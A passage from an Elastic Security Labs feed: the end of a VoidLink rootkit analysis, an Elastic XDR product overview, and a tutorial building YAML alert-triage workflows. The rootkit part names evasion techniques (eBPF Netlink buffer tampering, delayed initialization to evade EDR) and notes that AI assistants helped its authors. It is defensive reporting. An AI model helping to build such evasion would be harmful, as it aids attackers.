<p>Check Point Research's publications on VoidLink revealed the scope and ambition of the broader framework: a cloud-native, modular C2 platform with over 30 plugins, adaptive stealth, and multiple transport channels. Our analysis of the leaked rootkit source code complements those findings by providing a deep technical look at the kernel-level subsystem that underpins VoidLink's concealment capabilities. The hybrid LKM-eBPF architecture, spanning four generations of iterative development, demonstrates both technical ambition and practical operational awareness, producing a rootkit capable of comprehensive stealth across multiple kernel versions, from CentOS 7's kernel 3.10 through Ubuntu 22.04's kernel 6.2.</p>
<p>Several aspects of VoidLink stand out as particularly noteworthy. The eBPF Netlink buffer manipulation technique for <code>ss</code> hiding is rarely documented and represents a creative application of <code>bpf_probe_write_user</code> that defenders should be aware of. The delayed initialization strategy evades synchronous module-load security checks, a technique uncommon in the wild and indicative of an understanding of modern EDR behavior. The runtime ICMP credential rotation adds an operational security layer, making network signature-based detection a moving target.</p>
<p>The evidence of LLM-assisted development, both at the project-planning level, documented by Check Point, and at the code-iteration level, visible in our data dump, is perhaps the most significant finding for the threat landscape as a whole. Together, these analyses demonstrate that operators with moderate Linux knowledge can produce kernel-level rootkits by iterating with an AI assistant, lowering a barrier that previously required years of kernel development expertise. As LLMs continue to improve, we expect this pattern to accelerate, making rootkit development accessible to a broader range of threat actors.</p>
<p>We’ll continue to monitor for VoidLink deployments and variants and will update our detection rules as new indicators emerge.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/illuminating-voidlink/illuminating-voidlink.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Investigating from the Endpoint Across Your Environment with Elastic Security XDR]]></title>
            <link>https://www.elastic.co/security-labs/investigating-from-the-endpoint-across-your-environment</link>
            <guid>investigating-from-the-endpoint-across-your-environment</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This article highlights how Elastic Security XDR unifies endpoint protection with multi-domain security analytics to help analysts trace and contain multi-stage attacks across hybrid and cloud environments.]]></description>
            <content:encoded><![CDATA[<h2>Preamble</h2>
<p>Security investigations rarely stay confined to a single host. Today’s attackers increasingly use automation and AI to compress multi-stage attacks, turning what once unfolded over days into coordinated activity across endpoints, identities, workloads, and cloud services within minutes.</p>
<p>While many attacks begin on an endpoint, investigators must quickly determine how that activity spreads across the environment. In many environments, per-endpoint licensing limits how broadly protection and telemetry can be deployed, creating protection gaps during these investigations.</p>
<p>Elastic Security XDR is built around that reality. It includes best-in-class endpoint protection, without per-endpoint licensing constraints, in an agentic security operations platform where endpoint telemetry, infrastructure signals, and supporting artifacts can be analyzed together.</p>
<p>This post explores how Elastic Security XDR supports investigations across endpoints, workloads, and the broader environment, highlighting tools and workflows that help analysts collect evidence, pivot across telemetry, and respond efficiently.</p>
<h2>Endpoint at the heart of XDR</h2>
<p>The <a href="https://www.elastic.co/resources/security/report/global-threat-report">2025 Elastic Global Threat Report</a> reveals that with 90% of malware targeting Windows and browsers acting as the 'primary battleground', host-level visibility is essential to stopping a breach before it scales to the cloud. Elastic Defend, Elastic Security’s native endpoint protection, powers XDR from the endpoint outward. It not only prevents threats across Windows, macOS, and Linux, but also generates rich, investigation-grade telemetry that gives analysts the context they need to understand what happened on a host.</p>
<p>As activity occurs, Elastic Defend captures system events including process execution, file changes, network connections, and related artifacts. This telemetry forms the foundation for broader investigations, allowing analysts to correlate endpoint behavior with activity across workloads, identities, and other systems.</p>
<p>Multiple detection layers protect against malware, ransomware, fileless techniques, and other malicious behaviors, using both static and behavioral analysis. Independent validation from the <a href="https://www.elastic.co/blog/av-comparatives-business-security-test-2025">AV-Comparatives Business Security Test</a> confirms Elastic’s effectiveness; in the 2025 test cycle, Elastic Security was the only vendor that blocked every tested threat, earning perfect scores in both Real-World Protection and Malware Protection.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image2.png" alt="" /></p>
<p>Elastic also takes a principled approach to openness. Unlike many endpoint security tools that operate as a black box, Elastic publishes detection and prevention logic in an <a href="https://github.com/elastic/protections-artifacts">open repository</a>. This transparency lets analysts understand how protections work, validate them in their own environments, and prioritize high-risk gaps. By empowering users with visibility and insight, Elastic ensures security teams can act with confidence and maximize the value of their investigations.</p>
<h2>Beyond the endpoint: expanding the investigation</h2>
<p>Attacks rarely stay confined to a single host. Credentials may be compromised, workloads modified, or activity spread across cloud services and infrastructure. To fully understand an incident, analysts need to correlate endpoint activity with signals from the broader environment.</p>
<p>Elastic Security XDR enables this by bringing multiple data sources into the same analysis environment through <a href="https://www.elastic.co/integrations/data-integrations?solution=all-solutions&amp;category=security">hundreds of integrations</a> with popular security tools and data sources. Endpoint telemetry, whether collected by Elastic Defend or another EDR platform, can be analyzed alongside cloud activity, identity events, network telemetry, and third-party logs, without forcing organizations into a closed security stack. Elastic provides the <a href="https://www.elastic.co/docs/reference/ecs">common schema</a> and unified detection engine required to normalize disparate signals, allowing analysts to bypass manual data mapping and immediately pivot between sources to follow how activity moves across users, systems, and infrastructure.</p>
<p>Centralized <a href="https://elastic.github.io/detection-rules-explorer/">detection rules</a> operate across the unified dataset in the security platform, complementing <a href="https://github.com/elastic/protections-artifacts">real-time protections</a> that run directly on the endpoint. They enable alerts to reflect correlated activity across multiple domains. Suspicious process activity on a host can be matched with identity events, cloud API calls, or network behavior, helping analysts determine whether an event is isolated or part of a larger attack chain.</p>
<p>Container workloads highlight another way XDR extends investigations. <a href="https://www.elastic.co/security-labs/getting-started-with-defend-for-containers">Elastic Defend for Containers</a> monitors runtime behavior inside containerized environments, detecting suspicious activity such as unexpected process execution, privilege escalation, or access to sensitive resources. By connecting endpoint behavior to the broader environment, Elastic Security XDR gives analysts the visibility needed to scope incidents accurately, prioritize critical threats, and respond with confidence.</p>
<h2>Reconstructing the attack path</h2>
<p>After relevant telemetry is collected, analysts need to piece together what happened and how the attack progressed. Investigations involve pivoting between events, validating hypotheses, and assembling a complete timeline of activity across the environment.</p>
<p>Elastic Security XDR provides <a href="https://www.elastic.co/docs/solutions/security/investigate">investigation tools</a> designed to support this process. Visual Event Analyzer, Session View, and Timeline allow analysts to explore relationships between events, trace execution chains, and correlate activity across datasets while maintaining investigative context.</p>
<p>Visual Event Analyzer offers a graphical view of process relationships, helping analysts spot suspicious parent-child behavior and understand execution flows. Session View reconstructs activity within a process session, showing commands, network connections, and other actions as they unfolded. Timeline acts as an investigative workspace where analysts collect and correlate events from multiple sources, refine queries, and build a coherent attack narrative.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image5.png" alt="Investigate alerts &amp; processes with Event Analyzer" title="Investigate alerts &amp; processes with Event Analyzer" /></p>
<p>Together, these tools help analysts validate hypotheses faster, deepen analysis, and enable more confident response decisions.</p>
<h2>Agentic investigation: discovery, summarization, and natural language querying</h2>
<p>Elastic Security’s AI-driven investigative workflows help analysts keep pace with modern attacks by accelerating investigation and surfacing connected activity across the environment. Attack Discovery identifies connected alerts across endpoints, workloads, cloud services, and integrated third-party data, helping analysts uncover hidden attack chains without manually correlating events.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image6.png" alt="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." title="Attack Discovery detects and summarizes attack activity against the MITRE Attack Chain." /></p>
<p>Once an investigation is underway, Elastic AI Assistant and Agent Builder enable natural-language workflows that let analysts interact with data and automation more efficiently. Analysts can summarize observations, ask questions about entities and activity, and move seamlessly from supporting signals to containment or remediation actions. With the introduction of <a href="https://www.elastic.co/security-labs/agent-skills-elastic-security">agent skills</a>, teams can now extend these workflows with reusable, task-specific capabilities, such as alert triage, rule management, and case handling, allowing the assistant to execute complex, multi-step security tasks with the same consistency and repeatability as traditional automation, but through a conversational interface.</p>
<p>In practice, these capabilities reduce the time from an initial alert to full incident understanding, allowing SOC teams to respond faster, focus on high-priority threats, and act with confidence.</p>
<h2>Built-in forensics and host artifact collection</h2>
<p>During incident response, investigators often need to retrieve additional host artifacts to confirm attacker behavior, identify persistence, or validate user activity.</p>
<p>Elastic Security XDR includes built-in forensic capabilities that allow responders to collect investigative artifacts directly from affected hosts, reducing the need for separate forensic tooling during common investigative tasks. Elastic Defend supports capturing <a href="https://www.elastic.co/docs/solutions/security/endpoint-response-actions#memory-dump">memory snapshots</a> for deeper forensic analysis, while <a href="https://www.elastic.co/docs/solutions/security/investigate/osquery">Osquery Manager</a> enables analysts to run targeted queries to gather and examine host artifacts as part of an investigation.</p>
<p>Forensic visibility is further extended through ongoing collaboration with Osquery. By extending Osquery-based forensics with supplemental tables for common investigative artifacts, Elastic helps uncover evidence such as browser history, AMCache records, and jumplist artifacts. These sources make it easier for analysts to examine user activity and execution history on Windows systems during an investigation. Also available is a library of prebuilt forensic queries and packs to extract common investigative artifacts across Windows, macOS, and Linux, including:</p>
<ul>
<li>process listings and execution context</li>
<li>scheduled tasks, startup items, and persistence mechanisms</li>
<li>shell history and command execution artifacts</li>
<li>network configuration and connectivity context</li>
<li>file hashes and other execution-related artifacts</li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image3.png" alt="Osquery forensic packs within Elastic Security" title="Osquery forensic packs within Elastic Security" /></p>
<p>These capabilities turn artifact collection into an embedded step of the investigation, rather than a separate workflow, so teams can confirm what happened all in one platform and act sooner.</p>
<h2>Response actions that keep investigations moving</h2>
<p>Once investigators confirm malicious behavior, the priority shifts to containment and remediation. Elastic Security XDR enables analysts to take immediate action directly from the investigation context, isolating a host, terminating suspicious processes, collecting a file from the endpoint, or running a response script to collect additional evidence needed to complete the analysis.</p>
<p>For organizations using third-party EDRs, Elastic Security XDR can orchestrate containment and response across mixed environments, allowing teams to keep investigation, enforcement, and incident record-keeping anchored in a single platform.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image4.png" alt="Isolating a CrowdStrike-managed host directly from Elastic Security" title="Isolating a CrowdStrike-managed host directly from Elastic Security" /></p>
<div class="youtube-video-container">
  <iframe width="560" height="315" src="https://www.youtube.com/embed/Spgx80WKaqs?si=3XMt0uFsbNEtpcHv" title="Isolating a CrowdStrike-managed host directly from Elastic Security" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe>
</div>
<h2>Controlling removable media with Device Control</h2>
<p>Investigations often uncover risk paths beyond traditional malware, such as removable media usage or potential USB-based exfiltration. Elastic Security XDR’s Device Control capabilities let teams manage and enforce removable media policies across endpoints, reducing attack surface and preventing unauthorized data transfer.</p>
<p>Device Control also allows teams to automatically block USB devices and maintain a trusted set of approved devices, ensuring policies are enforced consistently across all endpoints.</p>
<h2>Scaling response with Elastic Workflows</h2>
<p>Incident response often follows repeatable steps. When an alert fires, teams enrich it, gather evidence, contain affected hosts, open cases, notify responders, and document decisions, ensuring investigations persist across handoffs and shift changes.</p>
<p><a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">Elastic Workflows</a> gives teams a way to encode those steps as a reusable playbook that runs inside the Elastic platform. Workflows are defined declaratively in YAML in Kibana, and can be triggered in multiple ways: when a Kibana alerting rule fires, on a schedule, or manually on demand.</p>
<p>From there, a workflow can execute a sequence of steps that look a lot like what an analyst would do manually:</p>
<ul>
<li>Query Elastic data (including ES|QL), transform results, and branch based on conditions.</li>
<li>Create or update a Case, attach supporting context, and keep an auditable record of what was collected and why.</li>
<li>Notify downstream systems (Slack, Jira, PagerDuty, and other services) using connectors you’ve already configured, or call internal/external APIs via HTTP steps.</li>
</ul>
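<p>As a minimal sketch, a playbook built from those pieces might look like the following. The trigger and step types follow the Elastic Workflows documentation, but the index pattern, field names, and case details here are illustrative rather than prescriptive:</p>
<pre><code class="language-yaml">name: Host Alert Triage
enabled: true

triggers:
  - type: alert            # runs when a linked detection rule fires

steps:
  # Count other recent alerts on the same host for context
  - name: related_activity
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | STATS alert_count = COUNT(*)
      format: json

  # Open a case carrying that context for the responder
  - name: open_case
    type: kibana.createCase
    with:
      title: &quot;Triage: {{ event.alerts[0].host.name }}&quot;
      description: &quot;{{ steps.related_activity.output.values[0][0] }} related alerts on this host.&quot;
      owner: securitySolution
      severity: medium
      tags:
        - automation
</code></pre>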
<p>This becomes especially impactful when paired with endpoint response capabilities. When an alert fires, teams can automatically isolate the host and kick off a standardized evidence bundle, capturing a memory dump, collecting a suspicious file (get-file), and listing running processes, so responders have what they need immediately.</p>
<p>The net effect is faster execution of the first steps in incident response, while investigations follow consistent playbooks across analysts and shifts. Instead of relying on memory and manual checklists, Workflows helps enforce a repeatable investigation standard and makes it easier to scale response when alert volume spikes.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/image1.png" alt="Alert Triage workflow built with Elastic Workflows native automation." title="Alert Triage workflow built with Elastic Workflows native automation." /></p>
<h2>Elastic Security Labs - Research that powers real-world defenses</h2>
<p>Elastic Security is informed by the work of <a href="https://www.elastic.co/security-labs/about">Elastic Security Labs</a>, a team dedicated to studying real adversary behavior and translating those findings into practical detection and investigation guidance. The team tracks emerging techniques, malware activity, and endpoint tradecraft, then turns that research into updates that matter in day-to-day security operations: new and refined detection rules, improvements to prevention logic, and clearer guidance on how to investigate what you’re seeing.</p>
<p>Elastic Security Labs also publishes technical write-ups and analyses to help the broader community understand how threats operate in the wild. For defenders, that research provides useful context behind detections: why a technique matters, what evidence to look for, and how to scope impact once an alert fires.</p>
<h2>Tying it all together</h2>
<p>As a core capability of our agentic security operations platform, Elastic Security XDR unifies traditionally siloed defenses to tackle the speed and complexity of modern threats. An initial host-based signal can quickly spread across endpoints, identities, and cloud services. Agentic workflows and agent skills help analysts investigate and respond at machine speed. Analysts no longer need to stitch together disconnected tools; they can follow attacker activity throughout the environment, combining endpoint prevention with autonomous investigative and response capabilities in a single platform.</p>
<h2>Learn More</h2>
<p>Visit <a href="https://elastic.co/security/xdr">elastic.co/security/xdr</a> to learn more. Try a free <a href="https://cloud.elastic.co/serverless-registration">Elastic Security trial</a>, explore Elastic Defend with our <a href="https://videos.elastic.co/watch/wVJRXJQR5orNBEkjgUbVRq">Getting Started video</a>, or practice with real malware at <a href="https://ohmymalware.com">ohmymalware.com</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/investigating-from-the-endpoint-across-your-environment/investigating-from-the-endpoint-across-your-environment.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Security Automation with Elastic Workflows: From Alert to Response]]></title>
            <link>https://www.elastic.co/security-labs/security-automation-with-elastic-workflows</link>
            <guid>security-automation-with-elastic-workflows</guid>
            <pubDate>Tue, 24 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[A practical guide to building intelligent, automated security playbooks with Elastic Workflows.]]></description>
            <content:encoded><![CDATA[<h2>The daily loop</h2>
<p>An alert fires. You open it. You read through the details. You gather context from the surrounding activity. You check for related signals across your environment. You decide what it means and what to do next. Sometimes you escalate. Sometimes you close it and move on.</p>
<p>You do this dozens of times a day. The steps are almost always the same. The data you need is already in your SIEM. The actions you take are predictable. But the work is still manual.</p>
<p>This is the kind of work that automation should handle. Not because it's hard, but because it's repetitive, and every minute spent on repetitive manual triage is a minute not spent on the alerts that actually need a human.</p>
<p>Elastic Workflows brings that automation into the SIEM itself. No separate tool. No integration to build. Your detection rule fires, and a workflow runs, with direct access to your alerts, cases, and security data.</p>
<p>This blog post walks through building a security playbook with Workflows, step by step. We'll start simple and build up to a workflow that runs when an alert fires, checks threat intel, gathers context, creates cases, notifies the team, and brings in AI when the investigation calls for it.</p>
<p>If you're new to Workflows, the <a href="https://www.elastic.co/search-labs/blog/elastic-workflows-automation">introductory technical deep dive</a> blog and <a href="https://www.youtube.com/watch?v=Tu505Zn1wUc">video</a> cover the core concepts of Workflows. This post focuses on applying these concepts in a security context.</p>
<h2>Quick orientation</h2>
<p>Workflows are YAML definitions that run inside Kibana. You define what should happen, and the platform handles execution. At a high level, a workflow is composed of three main parts: triggers (when it runs), steps (what it does), and data flow (how information moves between steps).</p>
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/triggers"><strong>Triggers</strong></a> decide when the workflow runs. An alert trigger runs on a detection. A scheduled trigger runs on a cadence. A manual trigger runs on demand. A workflow can have more than one.</p>
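<p>Concretely, a workflow that should run both on detections and on a recurring sweep can declare several triggers side by side. Treat this as a hedged sketch: the <code>alert</code> trigger matches the examples later in this post, while the exact <code>scheduled</code> and <code>manual</code> trigger syntax is an assumption based on the triggers documentation linked above:</p>
<pre><code class="language-yaml">triggers:
  - type: alert        # runs when a linked detection rule fires
  - type: scheduled    # assumed syntax: recurring run on a cadence
    with:
      every: &quot;1h&quot;
  - type: manual       # run on demand from Kibana
</code></pre>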
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/steps"><strong>Steps</strong></a> define what the workflow does. They run in order and can use outputs from earlier steps. They can query data in <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/elasticsearch">Elasticsearch</a>, update alerts and cases in <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/kibana">Kibana</a>, and <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/external-systems-apps">call external systems</a> like sending a Slack message or scanning a hash on VirusTotal. They can also apply logic such as conditionals or loops, and use <a href="https://www.elastic.co/docs/explore-analyze/workflows/steps/ai-steps">AI</a> for tasks like summarizing text, prompting an LLM, or invoking agents when deeper reasoning is needed.</p>
<p>This is the toolkit. With these primitives, you can build workflows that take a signal, gather context, and drive a response.</p>
<h2>Building a security playbook</h2>
<p>We'll build an alert triage workflow incrementally. Each section adds a capability, and by the end, you'll have a working playbook that handles the full triage loop.</p>
<h3>Start with the trigger</h3>
<p>Security workflows start with an event. It could be an alert, a case update, a user action, or a scheduled check. The workflow takes that signal, gathers context, and decides what to do next.</p>
<p>We’ll start with alert triage. It’s the most common path, and it shows the full loop end to end.</p>
<p>Here’s a minimal workflow with an alert trigger:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  # we'll build these out
</code></pre>
<p>The <code>alert</code> trigger connects this workflow to detection rules. You link a specific rule to this workflow from the rule's <strong>Actions</strong> settings in Kibana. When the rule fires, the workflow runs and receives the full alert context through the <code>event</code> variable. That includes <code>event.alerts</code> (the alert documents), <code>event.rule</code> (the rule metadata), and every field on the alert.</p>
<p>From here, you start adding steps.</p>
<h3>Check threat intel</h3>
<p>The first real step: take the file hash from the alert and check it against VirusTotal. Workflows have a built-in VirusTotal connector, so you don't need to construct HTTP requests or manage API keys in your YAML (connector credentials like VirusTotal API keys or Slack tokens are configured once in the connector under <strong>Stack Management &gt; Connectors</strong>):</p>
<pre><code class="language-yaml">  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true
</code></pre>
<p>Every step in a workflow follows a simple, consistent structure. It starts with a <code>name</code>, which gives the step a clear identity, and a <code>type</code>, which defines the action being performed. In this case, the step calls the VirusTotal file hash scan capability. Because this is a connector-backed action, it also includes a <code>connector-id</code>, which tells the workflow which configured integration to use, including its credentials.</p>
<p>The <code>with</code> block is where you pass inputs into the step. Each step type defines the parameters it accepts. Here, you provide the file hash to scan. Rather than hardcoding values, workflows use a built-in templating engine powered by LiquidJS. The <code>{{ }}</code> syntax lets you <a href="https://www.elastic.co/docs/explore-analyze/workflows/data#workflows-dynamic-values">reference data from the execution context</a>, so the hash is pulled directly from the alert that triggered the workflow.</p>
<p>Finally, the <code>on-failure</code> block defines how the step behaves if something goes wrong. In this case, it retries twice with a short delay and continues execution even if the lookup fails. This is important in production workflows, where a transient external API issue should not block the entire triage process.</p>
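<p>Because the templating engine is LiquidJS, standard Liquid filters work inside <code>{{ }}</code>. A small illustrative sketch, using the standard Liquid <code>default</code> and <code>upcase</code> filters on fields from the alert context described above:</p>
<pre><code class="language-yaml">    with:
      message: |
        Host: {{ event.alerts[0].host.name }}
        User: {{ event.alerts[0].user.name | default: &quot;unknown&quot; }}
        Rule: {{ event.rule.name | upcase }}
</code></pre>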
<h3>Gather context with ES|QL</h3>
<p>Next, query for related alerts on the same host. ES|QL runs directly against your security indices, so there's no API bridging or credential management:</p>
<pre><code class="language-yaml">  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json
</code></pre>
<p>This tells you whether the host has been generating other alerts, which rules triggered, and which users were involved. That context is included in the case description and informs the severity assessment later.</p>
<p>The same approach works for any enrichment that touches data in Elasticsearch: looking up a user's first-seen date, checking how many times a hash has appeared in your logs, or pulling the process tree from endpoint data. If the data is in your cluster, ES|QL can get it.</p>
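<p>For example, checking how often the alert's hash has appeared in your logs is just one more <code>elasticsearch.esql.query</code> step. This is a sketch: the <code>logs-*</code> index pattern and ECS field names are illustrative and should be adjusted to your own data:</p>
<pre><code class="language-yaml">  - name: hash_prevalence
    type: elasticsearch.esql.query
    with:
      query: |
        FROM logs-*
        | WHERE file.hash.sha256 == &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
        | STATS seen_count = COUNT(*), hosts = VALUES(host.name)
      format: json
</code></pre>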
<h3>Branch on findings</h3>
<p>Now the workflow needs to decide what to do. If VirusTotal flagged the file as malicious, create a case and respond. If not, close the alert as a false positive:</p>
<pre><code class="language-yaml">  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      # true positive path: steps below
    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>The <code>if</code> step evaluates a condition and runs different steps depending on the result. The false positive path closes the alert in a single step. The true positive path continues below.</p>
<h3>Create a case</h3>
<p>When the alert is confirmed malicious, open a case with context from previous steps:</p>
<pre><code class="language-yaml">      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null
</code></pre>
<p><a href="https://www.elastic.co/docs/explore-analyze/workflows/data#workflows-dynamic-values">Liquid templating</a> pulls data from the alert (<code>event</code>), from the VirusTotal results (<code>steps.check_virustotal.output</code>), and from the ES|QL query (<code>steps.related_alerts.output</code>). Every field from every previous step is available to every subsequent step.</p>
<h3>Notify the team</h3>
<p>Send a Slack message so the team knows a confirmed case is open:</p>
<pre><code class="language-yaml">      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}
</code></pre>
<p>Slack is one option. Jira, ServiceNow, PagerDuty, Microsoft Teams, email, and Opsgenie are all supported as connector steps.</p>
<h3>The complete workflow</h3>
<p>Here's the full workflow assembled:</p>
<pre><code class="language-yaml">name: Alert Triage Playbook
description: Enriches alerts, checks threat intel, creates a case, and notifies the team.
enabled: true
tags:
  - security
  - triage

triggers:
  - type: alert

steps:
  - name: check_virustotal
    type: virustotal.scanFileHash
    connector-id: &quot;my-virustotal&quot;
    with:
      hash: &quot;{{ event.alerts[0].file.hash.sha256 }}&quot;
    on-failure:
      retry:
        max-attempts: 2
        delay: 3s
      continue: true

  - name: related_alerts
    type: elasticsearch.esql.query
    with:
      query: |
        FROM .alerts-security*
        | WHERE host.name == &quot;{{ event.alerts[0].host.name }}&quot;
        | WHERE @timestamp &gt; NOW() - 24 hours
        | STATS
            alert_count = COUNT(*),
            rules_triggered = VALUES(kibana.alert.rule.name),
            users_involved = VALUES(user.name)
      format: json

  - name: check_malicious
    type: if
    condition: steps.check_virustotal.output.stats.malicious &gt; 5
    steps:
      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
          description: |
            Confirmed malicious file detected on {{ event.alerts[0].host.name }}.

            **Detection:** {{ event.rule.name }}
            **User:** {{ event.alerts[0].user.name }}
            **VirusTotal:** {{ steps.check_virustotal.output.stats.malicious }} engines flagged this file
            **Related alerts (24h):** {{ steps.related_alerts.output.values[0][0] }} 
              alerts from {{ steps.related_alerts.output.values[0][1] | size }} rules
          owner: securitySolution
          severity: high
          tags:
            - automation
            - malware
          settings:
            syncAlerts: false
          connector:
            id: none
            name: none
            type: &quot;.none&quot;
            fields: null

      - name: notify_team
        type: slack
        connector-id: &quot;security-alerts&quot;
        with:
          message: |
            Malware confirmed on {{ event.alerts[0].host.name }}.
            VirusTotal: {{ steps.check_virustotal.output.stats.malicious }} detections.
            Case created: {{ steps.create_case.output.id }}

    else:
      - name: close_false_positive
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
</code></pre>
<p>That's the triage loop, automated. Alert fires, threat intel checked, context gathered, decision made, case created, team notified. Every execution is logged and auditable.</p>
<p>This is a starting point. The <a href="https://github.com/elastic/workflows/blob/main/workflows/security/response/traditional-triage.yaml">traditional-triage.yaml</a> in the Elastic Workflows library on GitHub goes further: it isolates the host, looks up the on-call analyst, creates a dedicated Slack channel, assigns the case, and posts a rich incident summary. Same patterns, more steps.</p>
<h2>Adding AI to the playbook</h2>
<p>The workflow above handles a defined path. If the hash is malicious, do X; otherwise, do Y. That covers a lot of triage work. But not every alert fits a clean branching condition, and not every case description should be a list of raw fields.</p>
<p>Workflows include AI steps that handle the parts where structured logic runs out. There are three, and they work together.</p>
<h3>Classify: let AI drive the branching</h3>
<p>Instead of branching on a VirusTotal score threshold, use <code>ai.classify</code> to categorize the alert. It considers the full alert context, not just a single number:</p>
<pre><code class="language-yaml">  - name: classify_alert
    type: ai.classify
    with:
      input: &quot;${{ event }}&quot;
      categories:
        - malware
        - phishing
        - lateral_movement
        - data_exfiltration
        - false_positive
      instructions: |
        Classify this security alert based on the alert details,
        rule name, and affected entities.
      includeRationale: true
</code></pre>
<p>The output is structured: <code>steps.classify_alert.output.category</code> returns a single string like <code>&quot;malware&quot;</code> or <code>&quot;false_positive&quot;</code>. That drives the <code>if</code> condition directly. The rationale explains why, and you can include it in the case for audit purposes.</p>
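<p>Wired into the playbook, the category can replace the numeric threshold in the branch. A minimal sketch, assuming string equality works in <code>condition</code> expressions the same way the numeric comparison did earlier; the <code>rationale</code> output field name and the abbreviated case fields are also assumptions:</p>
<pre><code class="language-yaml">  - name: triage_decision
    type: if
    condition: steps.classify_alert.output.category == &quot;false_positive&quot;
    steps:
      - name: close_alert
        type: kibana.SetAlertsStatus
        with:
          status: closed
          reason: false_positive
          signal_ids:
            - &quot;{{ event.alerts[0]._id }}&quot;
    else:
      - name: create_case
        type: kibana.createCase
        with:
          title: &quot;{{ steps.classify_alert.output.category }}: {{ event.alerts[0].host.name }}&quot;
          description: |
            Classification rationale: {{ steps.classify_alert.output.rationale }}
          owner: securitySolution
          severity: high
</code></pre>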
<h3>Summarize: write case descriptions that adapt</h3>
<p>Rather than templating raw field values into a case description, use <code>ai.summarize</code> to generate a readable overview. Run it once before case creation for the initial description, and once after the agent investigation to update the description with the full picture:</p>
<pre><code class="language-yaml">  - name: initial_summary
    type: ai.summarize
    with:
      input: &quot;${{ event }}&quot;
      instructions: |
        Write a one-paragraph overview of this security alert.
        State what was detected, on which host, by which user, and the severity.
        Do not include recommendations. Just the facts.
      maxLength: 300
</code></pre>
<p>The summary adapts to whatever fields are present on the alert, so you don't need to account for every possible field combination in your Liquid templates. Use <code>steps.initial_summary.output.content</code> in the case description and the Slack notification.</p>
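<p>Concretely, the case-creation step from the earlier playbook can drop its hand-templated description in favor of the generated one. A sketch reusing the step shapes already shown, abbreviated for brevity:</p>
<pre><code class="language-yaml">  - name: create_case
    type: kibana.createCase
    with:
      title: &quot;Malware Detected: {{ event.alerts[0].file.hash.sha256 }}&quot;
      description: |
        {{ steps.initial_summary.output.content }}
      owner: securitySolution
      severity: high
      tags:
        - automation
        - malware
</code></pre>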
<h3>Agent: investigate what the playbook can't</h3>
<p>The <code>ai.agent</code> step invokes an Agent Builder agent. Unlike classify and summarize, an agent has access to tools. It can query your indices, check threat intel, correlate signals across data sources, and reason about what it finds:</p>
<pre><code class="language-yaml">  - name: escalate_to_agent
    type: ai.agent
    agent-id: &quot;security-agent&quot;
    create-conversation: true
    with:
      message: |
        Investigate this alert. Search for related activity on this host,
        check for persistence mechanisms and lateral movement,
        and determine the full scope of the incident.
        Alert: {{ event | json }}
        Classification: {{ steps.classify_alert.output.category }}
